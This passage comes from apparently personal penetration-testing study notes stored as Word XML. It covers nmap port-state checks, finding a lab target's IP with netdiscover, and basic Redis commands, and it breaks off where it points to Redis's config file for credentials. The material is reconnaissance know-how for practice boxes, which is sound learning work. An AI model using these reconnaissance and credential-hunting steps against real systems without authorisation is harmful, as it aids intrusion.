        <w:t xml:space="preserve">Adjusting scan types (e.g., SYN scan or UDP scan).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002915">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="486"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trying to identify filtering rules with tools like hping3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002916">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="486"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use --reason with nmap to understand why a port state was determined (nmap -p 80 --reason).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002917">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002918">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding these states helps in identifying the security posture of the target network and tailoring further scanning or attacks accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002919">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000291A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000291B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000291C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000291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1E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000291F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002920">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jndhtusxeky9" w:id="356"/>
      <w:bookmarkEnd w:id="356"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding IP of target machine (using netdiscover)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002921">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002922">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In some older boxes, like </w:t>
      </w:r>
      <w:hyperlink r:id="rId856">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cybersploit1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG play (although this walkthrough is back when cybersploit1 was in vulnhub so maybe it tells you to the IP now), they might not tell you the IP of the target machine, but rather give you an IP subnet range. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002923">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002924">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, to find the IP of the target machine, you have to use netdiscover:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002925">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1663700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="246" name="image241.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image241.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85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2926">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Idk how, but according to the walkthrough, they could tell that 192.168.1.14 was the target machine based on this output (second to last output)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002927">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is chatGPT guess</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002928">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1308100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="386" name="image370.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image370.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85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2929">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000292A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000292B">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2C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000292D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hs7ktu12bpk1" w:id="357"/>
      <w:bookmarkEnd w:id="357"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000292E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000292F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis (Remote Dictionary Server) is an open-source, in-memory data structure store commonly used as a database, cache, and message broker. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002930">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002931">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen on port 6379 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002932">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002933">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's similar to SQL in that it is a database. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002934">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002935">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The hierarchical structure is as such:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002936">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Database </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002937">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT [number]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where the number corresponds to the number of the database, to go into a specific database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002938">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The default and main database is usually "0"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002939">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000293A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">KEYS *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, to get all the keys in a Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DBSIZE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, while inside of a Database, to see how many keys there are</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000293C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keys are inside of the Database, and these are like "Keys and Values", where the keys are like a string representations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000293D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000293E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET [key name]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, to get the value of a specific key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000293F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the "value" section of the Key and Value model</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002940">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding key-value pair:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002941">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SET [key] [value]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002942">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ex. SET hello bye</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002943">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So here, the key would be "hello" and value is "bye"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002944">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="671"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can put the key or value in quotation marks if the key or value contains spaces</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002945">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002946">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Where are Redis Credentials stored:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002947">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="656"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/redis/redis.conf </w:t>
      </w:r>
